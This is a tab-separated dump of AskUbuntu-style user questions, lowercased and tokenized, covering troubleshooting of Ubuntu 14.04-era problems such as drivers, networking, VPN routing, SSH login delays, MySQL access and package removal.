/var/www/opengov/imagexmltocvstestpy/imgprocess.py '' , line 3 , in < module > from pil import image importerror : no module named pil i have tried running sudo pip uninstall pil to see if maybe re-installing it might clear the error . it asks if i want to proceed , naturally i say yes and it says it was removed . now when i ls /usr/lib/python2.7/dist-packages/pil i see that it is still there and when i try to sudo pip install pil , it of course says it is already there . what ? ? ? ?
470189	login screen is frozen on ubuntu 14.04 lts	i am running ubuntu 14.04 lts on my hp pavilion desktop . it works perfectly at the first login . and when i try to log in back after a successful logout , then the login screen freezes . i can not enter anything . any help will be much appreciated .
470192	14.04 resumes to black screen , no response	my laptop was working great with 13.10 , no problems with suspend/resume . however , after the upgrade to 14.04 , i started having issues resuming from suspend . the screen would be completely black , no keyboard or mouse input would have any effect ( including ctrl+alt+f1 to f7 ) . sometimes it would work fine but most of the time it did n't work , and i could n't find any pattern . i had to do a hard reboot . my laptop : dell inspiron 1525 graphics : intel gm965/gl960 ubuntu gnome 14.04
470194	ubuntu transfer from external hard disk	how i can transfer ubuntu from an external hard disk to my laptop ? i have windows also installed . thank you for answers .
470197	desktop launcher in ubuntu 12.04	i am trying to find a way to create a launcher for the desktop and to place it on the unity launcher panel on the left so as programs are maximized i can hit the launcher and the actual desktop will appear ( not a desktop folder ) , similar to a desktop shortcut in windows . all the answers i found were about general launchers . is there a way to do this ?
470199	can i reset all packages to repo versions without ppa-purge ?	this is just a theoretical for me ( it 's a real problem for another user ) but let 's say : i upgrade a load of packages from a ppa onto 12.04 i upgrade to 14.04 some packages are held in because my ppa-upgraded packages have newer versions that are breaking dependencies by this point i think it 's too late for ppa-purge to be useful . hypothetical-oli should have run ppa-purge before the upgrade ... but what 's done is done . how do we turn this dependency deadlock into a working , updateable system ? ideally we 'd send everything with ubuntu-repo versions back to those versions ... but how can i do that ?
470208	use multiple byobu sessions , while ignoring unrelated tmux sessions	so , i have access to a shared shell account where other people and i do some work . some people prefer use tmux , so they have open their tmux sessions , loading config from ~/.tmux.conf . i prefer to use byobu wrapper around tmux , since it has much nicer keybindings and other stuff . the problem is whenever there is a tmux session used by other people , whenever i run byobu it resumes their tmux session instead of creating a new byobu session for me . so , i tried running byobu-tmux new-session , but then it starts a new tmux session using their config ( from ~/.tmux.conf ) instead of byobu . how can i workaround that ?
470211	xfce4 keybinding and logout randomly not working since ubuntu 14.04	i upgraded my ubuntu installation from 12.04 lts to 14.04 lts a few weeks ago . everything works fine except xfce4 . since the update , i 'm sometimes unable to use my custom keybindings ( like alt-f1 in order to open a terminal ) . it only happens after a reboot , not during a session . when it happens , i have to force-reboot the whole computer , since i ca n't logout either . when i try to logout one time , nothing happens . when i try to logout another time , the message `` session manager must be in idle state when requesting a shutdown '' appears . i think some process is preventing xfce4 from login in/out . however , i tried to disable every autostart process ( ~/.config/autostart ) and beside the fact it 's faster , it does n't solve anything . do you happen to have any information about that problem ? thanks ! configuration : ubuntu 14.04 lts xfce4 4.10
470213	how can i find possible problems for my hdd ?	i am a new user of ubuntu . i just installed ubuntu 13.10 . i suspect that my hard drive has some problems ( maybe bad sectors ) . ubuntu fails to mount my hard drive . but when i go to settings/system info i have 626 gb . how can i make sure that my hard drive is okay or not ? i i would be very thankful if somebody gives me a clear explanation ( for a newb ! ) about what i can do to find out such problems , and how to deal with them ( if any ) . i only have one hard drive , and have not installed windows alongside ubuntu , i just have ubuntu ... thank you so much !
470214	unable to access ext4 partition , but can access fat32	i recently installed ubuntu on a new hard disk with several ext4 partitions and 1 fat32 partition for installing windows in the future . i am able to view all partitions in file manager . the partitions also get mounted when i click on them . however i am not able to create any files or folders in the ext4 partitions . it is strange that i am able to create files or folders on the fat32 partition . why does ubuntu make it so complicated ?
470217	red triangle in top and `` use this source '' error	i installed ubuntu 14.04 but after a month no update appears ! and when i click on update center it said your system is updated . but red triangle appears in top and said the update information is outdated . when i click on show updates again it said your system update . i also use terminal to update but it give me this error : gpg error : http : //dl.google.com stable inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) i 'm sure i have no problem with my connection ! and also when i want to install software e.x chromium it said use this source how can i solve these problems ?
470220	high cpu load for firefox 29 and hud with ubuntu 13.10	using firefox 29.0 on the recently upgraded ubuntu 13.10 results in high cpu load . by running top on the commandline i can see that the high cpu load goes to the following processes : pid user pr ni virt res shr s % cpu % mem time+ command 3540 dupo 20 0 236m 175m 2768 r 28.5 5.8 111:21.84 hud-service 32469 dupo 20 0 1051m 427m 50m s 13.3 14.1 9:38.83 firefox 3809 dupo 20 0 424m 65m 16m r 3.6 2.2 33:27.02 compiz 3503 dupo 20 0 6904 3156 904 s 1.7 0.1 7:00.64 dbus-daemon 3549 dupo 20 0 213m 86m 9856 s 1.7 2.8 23:36.36 unity-panel-ser 3863 dupo 20 0 53516 5168 4024 s 1.7 0.2 11:34.61 indicator-multi 1725 root 20 0 439m 96m 64m s 1.3 3.2 57:24.35 xorg this occupies constantly at least one quarter of the cpu capacity of the pc ( 2 cpus ) . it gets worse while browsing , particularly when it comes to pages with a lot of background json , such as fbook . after some time the computer gets too slow and occasionally irresponsive , preventing me from typing in a website text field or so . in that case , the only solution is restarting firefox .
470222	java applet / printing	we access a third party application ( java applet ) , which prints output to a postscript printer . we have been using this application on windows from quite some time successfully . our current setup is ubuntu 14.04 64 bit with firefox/icedtea-plugin and hp laserjet p2055 postscript printer setup in cups server . the applet throws an error saying the connected printer is not a postscript printer . we are reasonably there are certain dependency issues with the applet . unfortunately , we do n't get quality support from the vendor as they are only one in the market .
470223	click package validator is missing from ubuntu sdk !	i ca n't see an option to validate click packages in ubuntu-sdk . am i missing something ? i 'm on ubuntu 14.04 ubuntu-sdk version : 1.126 qtcreator-plugin-ubuntu version : 3.0.1+14.10.20140521.1-0ubuntu1~0trusty1 qtcreator version : 3.0.1-0ubuntu4
470227	firefox in ubuntu 14 stalls on wired connection	i have just installed ubuntu on a computer with wired internet . everything seems fine , but firefox will only load google , bing and gmail . all other web pages stall ; just keeps loading without getting anywhere . this is hopeless because you can not update or do anything . i have once installed ubuntu on my harddrive , and now on a usb stick : no difference . i have also reinstalled firefox , btu it did n't make any difference either . i have made the same installation on another computer with wifi connection , and that works fine . what is the matter ?
470232	setup cuda on 14.04 ( only using apt-get )	i have seen there are lots of answers here which cover how to install cuda by downloading the nvidia and cuda drivers from the nvidia site . however i want to install cuda only using apt-get as i find the other way quite error prone after having done it on several computers , afterall is n't this what apt-get is for . so i can run : sudo apt-get install nvidia-cuda-toolkit which works fine , and i can compile my cuda programs fine . however when i try to run them i instantly get a segmentation fault suggesting that the nvidia driver i am using is not right . there are several different options in the package repository and i do n't have a clue which i am supposed to use . so far i 've tried a few but have n't had any luck . does anyone know which nvidia driver packages i need ?
470233	how to run linux in efi mode after installing in legacy mode ?	i installed ubuntu in windows by making separate partition . my both os are installed in legacy mode but i want to switch to uefi . when i switch to uefi mode a black screen comes up instead of grub and it asks me to press esc . is it possible to switch to uefi ? do i need to make any partition for efi ? thanks in advance ...
470234	passing icmp between two interfaces	i 'm trying to setup routing between two network interfaces on an ubuntu machine . the first interface is the nic , connected to my lan . the second interface is a tunnel dev created by openvpn . the goals of this routing configuration are to 1 ) run a torrent server application which binds its peer connections to the openvpn tunnel interface , and route those through the vpn 2 ) leave normal internet packet routing alone for the nic interface . 3 ) eventually run a socks5 proxy server which accesses the internet through the vpn , but provides service through the lan interface . 4 ) eventually use a secondary ip on this machine which acts as an alternate gateway , for which the lan 's router will route certain destinations . so far , i have achieved goals 1 ) and 2 ) and working on the others . while the routing works for sockets bound to the vpn interface , the problem is that it seems to not be passing icmp packets between the interfaces . this will be a problem , as i will want to test routing with traceroute when i achieve goal 4 ) . > uname -a linux grover 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:31:42 utc 2014 i686 i686 i686 gnu/linux > ip addr 1 : lo : mtu 65536 qdisc noqueue state unknown group default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : mtu 1500 qdisc pfifo_fast state up group default qlen 1000 link/ether 00:25 : b3:0b : d3:0f brd ff : ff : ff : ff : ff : ff inet 192.168.1.2/24 brd 192.168.1.255 scope global eth0 valid_lft forever preferred_lft forever inet 192.168.1.10/24 brd 192.168.1.255 scope global secondary eth0:1 valid_lft forever preferred_lft forever inet6 fe80 : :225 : b3ff : fe0b : d30f/64 scope link valid_lft forever preferred_lft forever 11 : tunpia1 : mtu 1500 qdisc pfifo_fast state unknown group default qlen 100 link/none inet 10.192.1.6 peer 10.192.1.5/32 scope global tunpia1 valid_lft forever preferred_lft forever when the manual routing is done for the vpn tunnel , this is what the relevant routing looks like : > ip route show dev eth0 default via 192.168.1.1 169.254.0.0/16 scope link metric 1000 192.168.1.0/24 proto kernel scope link src 192.168.1.2 192.168.2.0/24 via 192.168.1.1 192.168.3.0/24 via 192.168.1.1 192.168.4.0/24 via 192.168.1.1 192.168.100.0/24 via 192.168.1.1 > ip rule show 0 : from all lookup local 32765 : from 10.192.1.6 lookup rt.tunpia1 32766 : from all lookup main 32767 : from all lookup default > ip route show table rt.tunpia1 default via 10.192.1.5 dev tunpia1 10.192.1.1 via 10.192.1.5 dev tunpia1 throw 192.168.1.0/24 ( the above table will eventually contain other throws for public inet addresses which will not be routed through the vpn . ) finally , the layer 3 bridging between the interfaces is done with : > iptables -t nat -a postrouting -o eth0 -j masquerade > iptables -t nat -a postrouting -o tunpia1 -j masquerade > iptables -a forward -i tunpia1 -o eth0 -m state -- state related , established -j accept > iptables -a forward -i eth0 -o tunpia1 -m state -- state related , established -j accept after this is done , > wget -o- http : //whatismyip.org -- bind-address 10.192.1.6 gives the expected result , and i am similarly able to access http services inside my local lan when bound to the tunpia1 interface ip address . however , while > ping 8.8.8.8 -i tunpia1 works , the following does not : > ping 192.168.1.1 -i tunpia1 tcpdump will show the icmp packets on the tunpia1 interface , but not on the eth0 interface . so my question is : why are icmp packets not being passed from the tunnel interface to the nic interface ?
470235	ubuntu 14.04-wired networks takes over 30 minutes to connect at work network and over couple of minutes at home network	i am using ubuntu gnome 14.04 . my question is closely related to following question on askubuntu : wired-network-takes-too-much-time-to-establish-connection-after-wake-up in addition to taking long time to connect to wired network after wake up , i am facing trouble with connecting to my work network . it keeps trying to acquire network connection for long time ( sometimes even more than 45 minutes ) and then suddenly connects . at home it starts with 192 ... . ip address but then restarting network solves the problem . but restarting network , even rebooting computer does n't help while trying to connect to work network . i looked into the syslog ( after reading other question ) and see that it keeps sending dhcprequest of `` my home dynamic ip address '' on eth0 to 255.255.255.255 port 67 ( xid=0x4f216654 ) and finally after long long time it gets dhcpnak from `` my work dynamic ip address '' after which wired network start working . i am just a user and do not understand what these entries mean . but does this mean that when i shut down my laptop at home the network manager does not release the home ip address ? how can i fix this issue ?
470236	pam_systemd delays ssh login - required ?	on our saucy servers ( 13.10 ) we are seeing long delays when logging into the systems via ssh . i figured out it is related to the line session optional pam_systemd.so in /etc/pam.d/common-session . when i comment that line , login is immediate . the /var/log/auth.log output that accompanies any delayed login attempts looks like this : may 21 17:33:58 control02 sshd [ 18488 ] : accepted publickey for daniel.schneller from 10.102.2.9 port 35763 ssh2 may 21 17:33:58 control02 sshd [ 18488 ] : pam_unix ( sshd : session ) : session opened for user daniel.schneller by ( uid=0 ) may 21 17:34:23 control02 sshd [ 18488 ] : pam_systemd ( sshd : session ) : failed to create session : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . i could not find any definite documentation yet whether or not i need the module at all . i could , of course , leave it commented out , because it seems to only wait for a timeout anyway at the moment , but i would rather understand the underlying cause and fix that , if at all possible , to prevent problems down the road .
470237	assigning a static ip to ubuntu server 14.04 lts	i 've installed ubuntu 14.04 lts server in my machine on a separate hard drive while having my windows 7 installation . the windows os has its full network connectivity and internet access through the ethernet , but the ubuntu installation does not . i have a hunch that this can be because my router which sees 2 different computers with the same mac address , and the dhcp is not working . how do i assign the machine a common static ip so that both partitions can use my network ? i am new to ubuntu and i could n't figure out which file to edit so that i can assign the static ip .
470243	wifi disconnect frequently on ubuntu 14.04 ( ralink rt3290 )	i have a problem with my wifi ralink rt3290 . i followed all the instructions according to `` ralink rt3290 wifi driver is not working in ubuntu 14.04 '' . now that my wifi works , but every hour it happens that data is flowing , although ubuntu indicates that the wifi is connected . it is always necessary to disconnect and connect to wifi or network , and then it works again . how can i get this fixed ?
470244	`` 'access denied for user 'root ' @ 'localhost ' '' when trying to do commands	the other day i was using mysql on my local database fine from the terminal . however , when i rebooted the next day and tried to use it , i get the following error for just about everything related to mysql . mysqladmin : connect to server at 'localhost ' failed error : 'access denied for user 'root ' @ 'localhost ' ( using password : no ) ' i have been going at this for a couple hours now .
470248	problem with tv tuner compro and ubuntu 14.04	i have tv tuner compro videomate tv pvr/fm in ubuntu 12.04 x64 : $ dmesg| grep tuner [ 12.072861 ] tuner 0-0060 : tuner -1 found with type ( s ) radio tv . [ 12.547646 ] tuner-simple 0-0060 : creating new instance [ 12.547650 ] tuner-simple 0-0060 : type set to **69** ( tena tnf 5335 and similar models ) $ dmesg| grep saa [ 10.908753 ] saa7130/34 : v4l2 driver version 0 , 2 , 17 loaded [ 10.908809 ] saa7134 [ 0 ] : found at 0000:04:01.0 , rev : 1 , irq : 18 , latency : 32 , mmio : 0xfbbff000 [ 10.908817 ] saa7134 [ 0 ] : subsystem : **185b : c200** , board : **compro videomate tv pvr/fm** [ card=**40** , insmod option ] [ 10.908832 ] saa7134 [ 0 ] : board init : gpio is 4c003f [ 11.051630 ] input : saa7134 ir ( compro videomate tv as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/0000:04:01.0/rc/rc0/input5 [ 11.051694 ] rc0 : saa7134 ir ( compro videomate tv as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/0000:04:01.0/rc/rc0 [ 11.199098 ] saa7134 [ 0 ] : i2c eeprom 00 : 5b 18 00 c2 ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199111 ] saa7134 [ 0 ] : i2c eeprom 10 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199121 ] saa7134 [ 0 ] : i2c eeprom 20 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199131 ] saa7134 [ 0 ] : i2c eeprom 30 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199141 ] saa7134 [ 0 ] : i2c eeprom 40 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199154 ] saa7134 [ 0 ] : i2c eeprom 50 : ff ff ff ff ff ff ff ff ff 04 ff 00 05 34 33 cb [ 11.199160 ] saa7134 [ 0 ] : i2c eeprom 60 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199165 ] saa7134 [ 0 ] : i2c eeprom 70 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199171 ] saa7134 [ 0 ] : i2c eeprom 80 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199176 ] saa7134 [ 0 ] : i2c eeprom 90 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199181 ] saa7134 [ 0 ] : i2c eeprom a0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199187 ] saa7134 [ 0 ] : i2c eeprom b0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199192 ] saa7134 [ 0 ] : i2c eeprom c0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199198 ] saa7134 [ 0 ] : i2c eeprom d0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199203 ] saa7134 [ 0 ] : i2c eeprom e0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 11.199209 ] saa7134 [ 0 ] : i2c eeprom f0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 12.562584 ] saa7134 [ 0 ] : registered device video1 [ v4l2 ] [ 12.562612 ] saa7134 [ 0 ] : registered device vbi0 [ 12.562632 ] saa7134 [ 0 ] : registered device radio0 [ 12.656933 ] saa7134 alsa driver for dma sound loaded [ 12.656955 ] saa7134 [ 0 ] /alsa : saa7134 [ 0 ] at 0xfbbff000 irq 18 registered as card -2 and in file /etc/modprobe.d/saa1734 alias char-major-81 videodev alias char-major-81â0 saa7134 options i2c-algo-bit bit_test=1 options saa7134 **card=40 tuner=69** secam=dk options saa7134 alsa=1 secam=d program tvtime and gnomeradio work good , but in 14.04 x64 we have $ dmesg| grep tuner [ 13.494932 ] tuner 0-0060 : tuner -1 found with type ( s ) radio tv . [ 13.578968 ] tuner-simple 0-0060 : creating new instance [ 13.578973 ] tuner-simple 0-0060 : type set to **5** ( philips pal_bg ( fi1216 and compatibles ) ) $ dmesg| grep saa [ 12.926781 ] saa7130/34 : v4l2 driver version 0 , 2 , 17 loaded [ 12.926971 ] saa7134 [ 0 ] : found at 0000:04:01.0 , rev : 1 , irq : 18 , latency : 32 , mmio : 0xfbbff000 [ 12.926979 ] saa7134 [ 0 ] : subsystem : **185b : c200** , board : **compro videomate gold+ pal** [ card=**49** , autodetected ] [ 12.926993 ] saa7134 [ 0 ] : board init : gpio is 4c003f [ 13.050945 ] input : saa7134 ir ( compro videomate go as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/0000:04:01.0/rc/rc0/input9 [ 13.051013 ] rc0 : saa7134 ir ( compro videomate go as /devices/pci0000:00/0000:00:1c.1/0000:03:00.0/0000:04:01.0/rc/rc0 [ 13.198858 ] saa7134 [ 0 ] : i2c eeprom 00 : 5b 18 00 c2 ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198873 ] saa7134 [ 0 ] : i2c eeprom 10 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198884 ] saa7134 [ 0 ] : i2c eeprom 20 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198900 ] saa7134 [ 0 ] : i2c eeprom 30 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198906 ] saa7134 [ 0 ] : i2c eeprom 40 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198911 ] saa7134 [ 0 ] : i2c eeprom 50 : ff ff ff ff ff ff ff ff ff 04 ff 00 05 34 33 cb [ 13.198917 ] saa7134 [ 0 ] : i2c eeprom 60 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198923 ] saa7134 [ 0 ] : i2c eeprom 70 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198929 ] saa7134 [ 0 ] : i2c eeprom 80 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198935 ] saa7134 [ 0 ] : i2c eeprom 90 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198941 ] saa7134 [ 0 ] : i2c eeprom a0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198946 ] saa7134 [ 0 ] : i2c eeprom b0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198952 ] saa7134 [ 0 ] : i2c eeprom c0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198958 ] saa7134 [ 0 ] : i2c eeprom d0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198964 ] saa7134 [ 0 ] : i2c eeprom e0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.198970 ] saa7134 [ 0 ] : i2c eeprom f0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 13.587147 ] saa7134 [ 0 ] : registered device video0 [ v4l2 ] [ 13.587196 ] saa7134 [ 0 ] : registered device vbi0 [ 13.587243 ] saa7134 [ 0 ] : registered device radio0 [ 13.623270 ] saa7134 alsa driver for dma sound loaded [ 13.623291 ] saa7134 [ 0 ] /alsa : saa7134 [ 0 ] at 0xfbbff000 irq 18 registered as card -2 tuner 5 , card 49 and name card compro videomate gold+ pal , but my card name compro videomate tv pvr/fm ? ? ? ? i tray in file /etc/modprobe.d/saa1734 use card 49 and tuner 5 , use card 40 tuner 69 , but my tvtime and gnomeradio not work ! ! ! ! can you help me with my problem ? i understand 14.04 is new version and may have some bugs , but i want use version 14.04 with my tv tuner .
470250	is there a pdf-reader which can find letter ä in a document ?	i found that okular wo n't find text that has letter ä . at least i tested with the following document : \documentclass [ 10pt ] { book } \usepackage [ utf8 ] { inputenc } \usepackage [ t1 ] { fontenc } \usepackage [ finnish ] { babel } \usepackage { blindtext } \usepackage { siunitx } \sisetup { output-decimal-marker = { , } } \usepackage [ a5paper ] { geometry } % \usepackage [ a5paper , top=2in , bottom=1.5in , left=1in , right=1in ] { geometry } \usepackage { scrextend } \changefontsizes { 10.0pt } % change base font size \usepackage { lettrine } \usepackage { fancyhdr } \usepackage { wasysym } \pagestyle { fancy } \fancyhf { } % clear all fields \fancyhead [ ro , le ] { \thepage } \linespread { 1.3 } \begin { document } äöäö \end { document } compiled with pdflatex demo.tex . is there a pdf-reader for ubuntu that can find such letters correctly , or is there some bash script that allows me to find such strings from pdf 's and scrolls okular to the location of the string in a pdf file ?
470251	what are the recommended hardware requirements 14.04	what are the recommended hw requirements for the different versions of ubuntu ?
470252	focus behaviour to 'follows-mouse ' resets to 'onclick ' on reboot ( ubuntu 14.04 )	whenever i set the focus mode to 'follow mouse ' with unity-tweak-tool , ubuntu-tweak or equal , this setting get 's reset to 'on-click ' whenever i reboot . how can i make this setting permanent ?
470257	dell poweredge r410 , ubuntu ( 14.04 ) running dead slow	i 've have a machine , dell poweredge r410 with ubuntu os installed in . i 'd no problem during installing , however , once it is done it has become annoying as performance is unforgivably abysmal . it runs dead slow that i have to keep typing in vigorously for entering as basic and short a word as password . the machine configuration is as follows : memory : 5.6 gib ; processor : intel xeon ( r ) cpu e5503 @ 2.00ghz x 4 ; graphics : gallum 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) ; os type : 64 bit ; disk : 320 gb ; this runs slow in that if i open any application it opens with layer by layer and becomes solid only in a while . i hunch this is an issue with graphics . kindly , help me get it run faster to a degree acceptable or suggest me a different version of ubuntu or linux that is compatible with the hardware . my intention is to use sql on this machine , primarily .
470265	display configuration	i am ssh into a virtual ubuntu proxy server and would like to capture the configuration like i do for cisco gear using show run . if i can just get it to display i can capture it through like putty . oh and i know very very little about ubuntu . thanks mike
470267	problem with integrating qnapi with nautilus	i have installed qnapi and i have done everything with instructions like this : '' to integrate qnapi with nautilus we need to install nautilus-actions packet and file qnapi-download.schemas which is in directory /usr/share/doc/qnapi you need to copy this file to directory /usr/share/gconf/schemas and make command : $ sudo gconf-schemas âregister /usr/share/gconf/schemas/qnapi-download.schemas restart and second option from bottom is downloading subtitles . everything works '' unfortunately i do n't have this option to download subtitles in context menu . anyone have some ideas how to integrate qnapi with nautilus . best regards
470268	only a purple background displayed during the login screen . no wallpaper	i get only a purple screen for the background during login . not even the default warty background . its been like that since i installed ubuntu . ever since i came to know about the background of the login screen that is supposed to change with the user , i have been trying to activate it . then i read that it should be activated by default , but since i did n't get any such screen , i searched for solutions . i followed the steps here . still , i could n't figure out to fix it . i checked the log files in /var/log/lightdm/ i found these warnings in x-0-greeter.log : activating service name='org.a11y.atspi.registry' [ +0.00s ] debug : unity-greeter.vala:435 : starting unity-greeter 13.10.3 uid=111 lang=en_us.utf-8 [ +0.00s ] debug : unity-greeter.vala:438 : setting cursor [ +0.00s ] debug : unity-greeter.vala:452 : loading command line options [ +0.00s ] debug : unity-greeter.vala:480 : setting gtk+ settings successfully activated service 'org.a11y.atspi.registry' ** ( at-spi2-registryd:7017 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( at-spi2-registryd:7017 ) : warning ** : unable to register client with session manager [ +0.14s ] debug : unity-greeter.vala:503 : creating unity greeter ... . [ +0.34s ] debug : starting authentication for user subhrajit ... [ +0.34s ] debug : wrote 25 bytes to daemon ** ( gnome-settings-daemon:7038 ) : warning ** : unable to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files [ +0.40s ] debug : starting authentication for user subhrajit ... ... . [ +0.54s ] debug : background.vala:155 : error loading background : failed to open file '/home/subhrajit/pictures/pictures/hd wallpapers/wallpaper 1080 ( 12 ) .jpg ' : permission denied ( gnome-settings-daemon:7038 ) : power-plugin-warning ** : failed to run getactive ( ) function on screensaver : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface 'org.gnome.screensaver ' on object at path /org/gnome/screensaver [ +0.80s ] debug : connected to application indicator service . [ +0.81s ] debug : unity-greeter.vala:177 : starting system-ready sound ** ( nm-applet:7055 ) : warning ** : could not create object for /org/freedesktop/networkmanager/settings/1 : uid 111 has no permission to perform this operation ** ( nm-applet:7055 ) : warning ** : handle_property_changed : failed to update property 'available-connections ' of object type nmdeviceethernet . [ +0.95s ] debug : background.vala:117 : render of background complete ... . [ +3.69s ] debug : starting session ubuntu [ +3.69s ] debug : wrote 18 bytes to daemon ** ( gnome-settings-daemon:7038 ) : warning ** : name taken or bus went away - shutting down ( gnome-settings-daemon:7038 ) : dconf-warning ** : failed to commit changes to dconf : the connection is closed ** message : pid 7055 ( we are 7055 ) sent signal 15 , shutting down ... ( nm-applet:7055 ) : libappindicator-warning ** : unable to send signal for newstatus : the connection is closed hope this helps .
470269	how do i add iheartradio sations to radio tray ?	i recently installed radio tray to my system so i could listen to iheartradio , but i do n't know where to get the urls of the radio stations i like , how do i get the and how do i add them ?
470270	can not install any softwares from software center in ubuntu 14.04 . install icon is greyed	this is just example . it is same for software download pages including vlc , synaptic package manager etc . please any one help me . i reinstalled ubuntu & also updated just now and the problem is still the same .
470271	make ntfs hdd only visible in ubuntu	is it possible to create or make a ntfs partition that only visible in ubuntu/linux ? and how do we make it ?
470273	how to view utf-8 unicode characters in vim	i am using vim 7.4 on an ubuntu 14.04 64 bit machine . in my .vimrc file , i have the following lines : '' use utf-8 without bom set encoding=utf-8 nobomb the config file basically uses unicode character to display white spaces like tabs , new lines , etc . the complete .vimrc file is taken from paul irish 's dotfiles . on an earlier install of 14.04 as well as in previous distributions , i was able to see the unicode characters without any problems but not with this one . i also tried : set fileencodngs=utf-8 but , the above setting has no effect and i still see garbled characters on the screen . is there any way around this ?
470274	arcade cabinets and ubuntu legalities	this is just a quick one for anyone who knows the legal side of ubuntu . what are the legal issues and licensing boundaries with making money from arcade cabinets in bars and pubs that use ubuntu as their os ? keep the legal issues to ubuntu , rather then hardware , pub licences , unity licence etc . thanks for any time spend answering my query . daniel
470276	ca n't run codeignitor project in lamp	when i run my web sited using lamp it goes to my index page but i canât go to other sites and it gives 404 error not found the requested url /utrippers/auth/login was not found on this server . apache/2.4.7 ( ubuntu ) server at localhost port 80 i change my project folders also , by using this find /var/www/html/new/ -type f -exec chmod 777 { } \ ; find /var/www/html/new/ -type d -exec chmod 777 { } \ ; and run this also sudo a2enmod userdir but still getting error 404 in my .htaccess i have rewriteengine on rewritecond % { request_uri } ^system . * rewriterule ^ ( . * ) $ /index.php/ $ 1 [ l ] rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule ^ ( . * ) $ index.php/ $ 1 [ l ]
470279	internet slow on ubuntu 14.04	i 've installed ubuntu 14.04 on my hp i7 laptop . it is dual-boot setup along with windows 8 . ubuntu -- -- installed on -- > ssd 32gb windows 8 -- -- installed on -- > hdd problem : internet works much slower on ubuntu , most of the times web-pages do n't even open . on windows 8 , it runs buttery smooth , i have no problem what so ever in windows 8 . i have tried to connect with multiple wifi routers ( as i 'm in my university ) and windows 8 does n't have any slow browsing problem , only ubuntu has . so kindly guide me what can i do ? browsers on ubuntu : chromium ( primary ) firefox one thing to note is that i 'm behind a proxy server . i ca n't check connectivity on broadband . what works ? wired connection ( lan/ethernet ) works fine in ubuntu 14.04 . i seem to have only problem with wifi connections , & wifi connections are my 97 % main source of surfing .
470281	i ca n't install flash on ubuntu 14.04 to play facebook games , videos or youtube videos	well , i ca n't install flash on ubuntu 14.04 to play facebook games , videos or youtube videos . i tried many times but the problem exists . i 'm using firefox . i 've installed ubuntu restricted extras . thanks
470283	i ca n't remove tuxcut , can anyone help me here ?	when i click on remove button , it says i ca n't remove it because of the following error : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % [ .. ] ( reading database ... 100 % ( reading database ... 202508 files and directories currently installed . ) removing tuxcut ( 5.0 ) ... rm : can not remove /usr/bin/run-tuxcut : no such file or directory dpkg : error processing package tuxcut ( -- remove ) : subprocess installed pre-removal script returned error exit status 1 dpkg : arptables : dependency problems , but removing anyway as you requested : tuxcut depends on arptables . removing arptables ( 0.0.3.4-1 ) ... dpkg : dsniff : dependency problems , but removing anyway as you requested : tuxcut depends on dsniff . removing dsniff ( 2.4b1+debian-22.1 ) ... removing libnids1.21 ( 1.23-2 ) ... removing libnet1 : amd64 ( 1.1.6+dfsg-2ubuntu1 ) ... dpkg : wondershaper : dependency problems , but removing anyway as you requested : tuxcut depends on wondershaper . removing wondershaper ( 1.1a-6 ) ... dpkg : arp-scan : dependency problems , but removing anyway as you requested : tuxcut depends on arp-scan ; however : package arp-scan is to be removed . removing arp-scan ( 1.8.1-2ubuntu1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... errors were encountered while processing : tuxcut
